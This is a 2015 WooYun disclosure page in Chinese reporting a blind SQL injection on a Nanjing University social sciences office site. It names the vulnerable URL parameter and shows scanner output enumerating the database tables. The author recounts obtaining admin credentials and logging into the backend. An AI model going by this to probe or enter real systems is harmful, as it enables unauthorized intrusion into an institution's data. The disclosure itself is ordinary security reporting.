南京大学社会科学处存在SQL盲注一枚 | wooyun-2015-0115393| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0115393

漏洞标题：南京大学社会科学处存在SQL盲注一枚

漏洞作者：尊-折戟

提交时间：2015-05-22 12:12

修复时间：2015-07-10 15:06

公开时间：2015-07-10 15:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-22：细节已通知厂商并且等待厂商处理中
2015-05-26：厂商已经确认，细节仅向厂商公开
2015-06-05：细节向核心白帽子及相关领域专家公开
2015-06-15：细节向普通白帽子公开
2015-06-25：细节向实习白帽子公开
2015-07-10：细节向公众公开

简要描述：

南京大学社会科学处SQL盲注一枚。。。泄露大部分信息。

详细说明：

注入点

http://skch.nju.edu.cn/showliterary.php?id=65

$KSE%J]_LDK{ANV1B1@%5]CO.jpg$

跑一下,数据库出来了。。。。

真没想到管理员是'sa'权限，想着拿这台服务器也不难吧。看。。

然后继续。。跑出好多表

[18:36:42] [INFO] fetching tables for database: msdb
[18:36:42] [INFO] the SQL query used returns 92 entries
Database: msdb
[92 tables]
+-------------------------------------+
| MSdatatype_mappings                 |
| MSdbms_datatype_mapping             |
| MSdbms_datatype_mapping             |
| MSdbms_datatype_mapping             |
| MSdbms_map                          |
| backupfilegroup                     |
| backupfilegroup                     |
| backupmediafamily                   |
| backupmediaset                      |
| backupset                           |
| log_shipping_monitor_alert          |
| log_shipping_monitor_error_detail   |
| log_shipping_monitor_history_detail |
| log_shipping_monitor_primary        |
| log_shipping_monitor_secondary      |
| log_shipping_primaries              |
| log_shipping_primary_databases      |
| log_shipping_primary_secondaries    |
| log_shipping_secondaries            |
| log_shipping_secondary_databases    |
| log_shipping_secondary_databases    |
| logmarkhistory                      |
| restorefilegroup                    |
| restorefilegroup                    |
| restorehistory                      |
| sqlagent_info                       |
| suspect_pages                       |
| sysalerts                           |
| syscachedcredentials                |
| syscategories                       |
| sysdatatypemappings                 |
| sysdbmaintplan_databases            |
| sysdbmaintplan_history              |
| sysdbmaintplan_jobs                 |
| sysdbmaintplans                     |
| sysdownloadlist                     |
| sysdtscategories                    |
| sysdtslog90                         |
| sysdtspackagefolders90              |
| sysdtspackagelog                    |
| sysdtspackages90                    |
| sysdtspackages90                    |
| sysdtssteplog                       |
| sysdtstasklog                       |
| sysjobactivity                      |
| sysjobhistory                       |
| sysjobs_view                        |
| sysjobs_view                        |
| sysjobschedules                     |
| sysjobservers                       |
| sysjobstepslogs                     |
| sysjobstepslogs                     |
| sysmail_account                     |
| sysmail_allitems                    |
| sysmail_attachments_transfer        |
| sysmail_attachments_transfer        |
| sysmail_configuration               |
| sysmail_event_log                   |
| sysmail_faileditems                 |
| sysmail_log                         |
| sysmail_mailattachments             |
| sysmail_mailitems                   |
| sysmail_principalprofile            |
| sysmail_profileaccount              |
| sysmail_profileaccount              |
| sysmail_query_transfer              |
| sysmail_send_retries                |
| sysmail_sentitems                   |
| sysmail_server                      |
| sysmail_servertype                  |
| sysmail_unsentitems                 |
| sysmaintplan_logdetail              |
| sysmaintplan_logdetail              |
| sysmaintplan_plans                  |
| sysmaintplan_subplans               |
| sysnotifications                    |
| sysoperators                        |
| sysoriginatingservers_view          |
| sysoriginatingservers_view          |
| sysproxies                          |
| sysproxylogin                       |
| sysproxyloginsubsystem_view         |
| sysproxysubsystem                   |
| sysschedules_localserver_view       |
| sysschedules_localserver_view       |
| syssessions                         |
| syssubsystems                       |
| systargetservergroupmembers         |
| systargetservergroups               |
| systargetservers_view               |
| systargetservers_view               |
| systaskids                          |
+-------------------------------------+

| DM_PROJECT_COOPERATE         |
| DM_PROJECT_FORM              |
| DM_PROJECT_LEVEL             |
| DM_PROJECT_SOURCE            |
| DM_PROJECT_STATE             |
| DM_PROJECT_STAT_SOURCE       |
| DM_PRO_CHECKUP               |
| DM_PRO_FINISH_FORMAL         |
| DM_PUBLISH_ADDRESS           |
| DM_PUBLISH_LEVLE             |
| DM_PUBLISH_RANGE             |
| DM_QUERY_LOGIC               |
| DM_REPORT_TYPE               |
| DM_RESEARCH_TYPE             |
| DM_RESEARCH_UNIT_KIND        |
| DM_RESEARCH_UNIT_LEVEL       |
| DM_RESEARCH_UNIT_TYPE        |
| DM_RESHIP_NAME               |
| DM_RESHIP_TYPE               |
| DM_RIGHT                     |
| DM_ROLE_LEVEL                |
| DM_ROLE_LEVEL                |
| DM_SCHOOL_SIGN               |
| DM_SCHOOL_SIGN               |
| DM_SCHOOL_SUBJECT            |
| DM_SEARCH_TYPE               |
| DM_SECRET_LEVEL              |
| DM_SECRET_TIER               |
| DM_SEX                       |
| DM_SHJJMB                    |
| DM_STA_TYPE                  |
| DM_SUBJECT                   |
| DM_SUB_CONTRACT_TYPE         |
| DM_TEACHER_TYPE              |
| DM_TICHENG_PROPORTION        |
| DM_TITLE_DEFINE              |
| DM_TITLE_LEVEL               |
| DM_TITLE_TYPE                |
| DM_TRANSPRODUCT_TYPE         |
| DM_TUTOR                     |
| DM_UNITBOOK_TYPE             |
| DM_UNITHONOR_TYPE            |
| DM_UNITJDPRODUCT_TYPE        |
| DM_UNITPAPER_TYPE            |
| DM_UNITPERSON_TYPE           |
| DM_UNITPROJECT_TYPE          |
| DM_UNIT_LEVEL                |
| DM_UNIT_ORDER                |
| DM_UNIT_TYPE                 |
| DM_UNIT_ZCLX                 |
| DM_WEB_COUNT                 |
| DM_YEAR                      |
| KH_ASSESS_RESULT_STATE       |
| KH_ASSESS_STATE              |
| KH_ASSESS_TIME               |
| KH_ATTRIB_VALUE              |
| KH_ATTRIB_VALUE              |
| KH_CUSTOMIZE_DISTRIBUTE_MODE |
| KH_DISPLAY_ATTRIB            |
| KH_OBJECT_ATTRIB_MODE        |
| KH_OBJECT_ATTRIB_MODE        |
| KH_OBJECT_WEIGHT_MODE        |
| KH_PERSON                    |
| KH_POSITION_ASSESS           |
| KH_RESULT_COMPUTE            |
| KH_RESULT_DETAIL             |
| KH_SCHEME                    |
| KH_TARGET                    |
| KH_UNIT                      |
| KH_WEIGHT_VALUE              |
| KH_WEIGHT_VALUE              |
| KJ_BASE10                    |
| KJ_BASE2                     |
| KJ_BASE5                     |
| KJ_BOOK_TYPE                 |
| KJ_EDU_LEVEL                 |
| KJ_HONOR_LEVEL               |
| KJ_HONOR_TYPE                |
| KJ_HONOR_UNIT_ORDER          |
| KJ_INDUSTRY                  |
| KJ_PROJECT_HZXS              |
| KJ_PROJECT_SOURCE            |
| KJ_PROJECT_ZZXS              |
| KJ_PUBLISH_AREA              |
| KJ_QKLX                      |
| KJ_QKZQ                      |
| KJ_QK_LANGUAGE               |
| KJ_RESEARCH_TYPE             |
| KJ_SEX                       |
| KJ_ST7_CATEGORY              |
| KJ_SUBJECT_CLASS             |
| KJ_SUBJECT_CLASS             |
| KJ_TITLE_LEVEL               |
| KJ_TITLE_TYPE                |
| KJ_UNIT_CLASS                |
| KJ_UNIT_FORM                 |
| KJ_UNIT_TYPE                 |
| PERSON                       |
| PRODUCT_AUTHOR_VIEW          |
| PRODUCT_AUTHOR_VIEW          |
| PRODUCT_VIEW                 |
| RESEARCH_UNIT_BOOK           |
| RESEARCH_UNIT_HONOR          |
| RESEARCH_UNIT_JDPRODUCT      |
| RESEARCH_UNIT_PAPER          |
| RESEARCH_UNIT_PERSON         |
| RESEARCH_UNIT_PRODUCT        |
| RESEARCH_UNIT_PROJECT        |
| SK_ACHIEVEMENT               |
| SK_ACTIVE_TYPE               |
| SK_ACTIVE_TYPE               |
| SK_AUTHORIZE_DEP             |
| SK_BASE8                     |
| SK_DOWNLOAD                  |
| SK_EDU_DEGREE                |
| SK_EDU_LEVEL                 |
| SK_FILE_MANAGE_TYPE          |
| SK_FILE_MANAGE_TYPE          |
| SK_HONOR_GRADE               |
| SK_HONOR_LEVEL               |
| SK_LINKING                   |
| SK_LITERARY                  |
| SK_LOCATION                  |
| SK_MEETING_TYPE              |
| SK_NOTICE_TYPE               |
| SK_NOTICE_TYPE               |
| SK_PERSON_TYPE               |
| SK_PERSON_TYPE               |
| SK_PICNEWS                   |
| SK_PRIZE                     |
| SK_PRODUCT_MODE              |
| SK_PROJECT_SOURCE            |
| SK_PROJECT_STATUS            |
| SK_PUBLISH_CIRCLE            |
| SK_PUBLISH_RANGE             |
| SK_RESEARCH_TYPE1            |
| SK_RESEARCH_TYPE1            |
| SK_RESEARCH_TYPE1            |
| SK_RESEARCH_UNIT_TYPE        |
| SK_SEX                       |
| SK_STUDY_MANAGER             |
| SK_SUBJECT                   |
| SK_TITLE                     |
| SK_UNIT_FORM                 |
| STATISTIC_STATE              |
| STATISTIC_STATE              |
| STA_ACTIVITY_2008            |
| STA_ACTIVITY_2008            |
| STA_FEE_2008                 |
| STA_FEE_2008                 |
| STA_PERSON1_2008             |
| STA_PERSON1_2008             |
| STA_PERSON1_2008             |
| STA_PERSON2_2008             |
| STA_PERSON2_2008             |
| STA_PRODUCT2_2008            |
| STA_PRODUCT2_2008            |
| STA_PRODUCTHONOR_2008        |
| STA_PRODUCTHONOR_2008        |
| STA_PRODUCT_2008             |
| STA_PRODUCT_2008             |
| STA_PROJECT1_2008            |
| STA_PROJECT1_2008            |
| STA_PROJECT2_2008            |
| STA_PROJECT2_2008            |
| STA_RESEARCH_2008            |
| STA_RESEARCH_2008            |
| STA_UNIT                     |
| S_ACT                        |
| S_ARTICLE                    |
| S_ART_PRODUCT                |
| S_ASSESS_TIME                |
| S_ATTACHMENT                 |
| S_ArtProduct_Author          |
| S_BOOK_AUTHOR                |
| S_BOOK_AUTHOR                |
| S_BREED_AUTHOR               |
| S_BREED_AUTHOR               |
| S_COLUMN                     |
| S_CONDITION                  |
| S_DOCUMENT_ACCEPT            |
| S_DOCUMENT_ACCEPT            |
| S_DOCUMENT_RESPONSE          |
| S_DOWNLOAD                   |
| S_EDITION_SUBMODULE          |
| S_EMAIL_INFO                 |
| S_EMAIL_INFO                 |
| S_EXPRESS_ADVANCED           |
| S_EXPRESS_DEFAULT            |
| S_EXPRESS_SIMPLE             |
| S_HELP                       |
| S_HONOR_AUTHOR               |
| S_HONOR_AUTHOR               |
| S_INCOME_PEITAO              |
| S_JDPRODUCT_AUTHOR           |
| S_JDPRODUCT_AUTHOR           |
| S_JOIN_MEETING               |
| S_KJ_STAT                    |
| S_KY_PLAN                    |
| S_LECTURE                    |
| S_MAGAZINE                   |
| S_MAIN_MANAGE_UNIT           |
| S_MANAGE_UNIT                |
| S_MEDICINE_AUTHOR            |
| S_MEDICINE_AUTHOR            |
| S_MEETING                    |
| S_MIDDEL_CHECK_PROJECT       |
| S_MODULE_TERM                |
| S_NOTIRY                     |
| S_PAPER_AUTHOR               |
| S_PAPER_AUTHOR               |
| S_PAPER_EMBODY               |
| S_PAPER_RESHIP               |
| S_PATENT_AUTHOR              |
| S_PATENT_AUTHOR              |
| S_PATENT_PAY                 |
| S_PERSON_MANAGER             |
| S_PERSON_MANAGER             |
| S_PRODUCTTRANS_AUTHOR        |
| S_PRODUCT_TRANSFORM          |
| S_PROJECT_APPLY_BOOK         |
| S_PROJECT_APPLY_BOOK         |
| S_PROJECT_APPLY_INFO         |
| S_PROJECT_COMPLETION         |
| S_PROJECT_CONTRACT_FEE       |
| S_PROJECT_DRAWBACK           |
| S_PROJECT_FEE_BALANCE        |
| S_PROJECT_INCOME             |
| S_PROJECT_INVOICE            |
| S_PROJECT_MEMBER             |
| S_PROJECT_MIDDLE_CHECK_BOOK  |
| S_PROJECT_MIDDLE_CHECK_INFO  |
| S_PROJECT_PAYOUT             |
| S_PROJECT_PLAN               |
| S_PROJECT_YEAR_FEE           |
| S_PRO_MEMBER_INCOME          |
| S_RESEARCH_REPORT_AUTHOR     |
| S_RESEARCH_REPORT_AUTHOR     |
| S_RESEARCH_UNIT_BOOK         |
| S_RESEARCH_UNIT_BOOK         |
| S_RESEARCH_UNIT_HONOR        |
| S_RESEARCH_UNIT_JDPRODUCT    |
| S_RESEARCH_UNIT_JOIN_PRODUCT |
| S_RESEARCH_UNIT_PAPER        |
| S_RESEARCH_UNIT_PERSON       |
| S_RESEARCH_UNIT_PROJECT      |
| S_RIGHT_ROLE                 |
| S_ROLE_SUBMODULE             |
| S_SCHOOL_FEE                 |
| S_SCHOOL_FEE                 |
| S_SHORT_MESSAGE              |
| S_SOURCESHARE                |
| S_STAT_MAGAZINE              |
| S_STA_CONVERT_ITEM           |
| S_STUDY_MANAGER              |
| S_SUBPROJECT                 |
| S_UNIT                       |
| actions                      |
| admin                        |
| batch                        |
| blocked_ips                  |
| book_author                  |
| cache_bootstrap              |
| cache_bootstrap              |
| cache_form                   |
| cache_menu                   |
| cache_page                   |
| cache_path                   |
| date_format_type             |
| dtproperties                 |
| meeting                      |
| paper_author                 |
| paper_author                 |
| product_achieve              |
| product_achieve              |
| project_outlay               |
| project_outlay               |
| project_work                 |
| rd_check_data1               |
| rd_common_state              |
| rd_common_state              |
| rd_patent_info               |
| research_sta                 |
| role                         |
| school_fee                   |
| statistic_submodule          |
| unit_person                  |
| unit_person                  |
| unit_product                 |
| unit_project                 |
| variable                     |
+------------------------------+
[18:03:17] [INFO] fetched data logged t
h.nju.edu.cn'
[*] shutting down at 18:03:17

最后，得到用户名和密码

成功进入后台：

发现许多东西。。

$)W{SK_CO6CPE%Q0R8XM~U94.jpg$

可以找到学校的办公系统网站。。
还是算了吧，我就到这了，做个好公民！

漏洞证明：

$KSE%J]_LDK{ANV1B1@%5]CO.jpg$

修复方案：

严格控制关键字，加强前后台防范！

版权声明：转载请注明来源尊-折戟@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2015-05-26 15:04

厂商回复：

已提交相关业务部门处理

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0115393

漏洞标题：南京大学社会科学处存在SQL盲注一枚

相关厂商：nju.edu.cn

漏洞作者：尊-折戟

提交时间：2015-05-22 12:12

修复时间：2015-07-10 15:06

公开时间：2015-07-10 15:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源尊-折戟@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0115393

漏洞标题：南京大学社会科学处存在SQL盲注一枚

相关厂商：nju.edu.cn

漏洞作者： 尊-折戟

提交时间：2015-05-22 12:12

修复时间：2015-07-10 15:06

公开时间：2015-07-10 15:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0115393"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 尊-折戟@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：尊-折戟

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源尊-折戟@乌云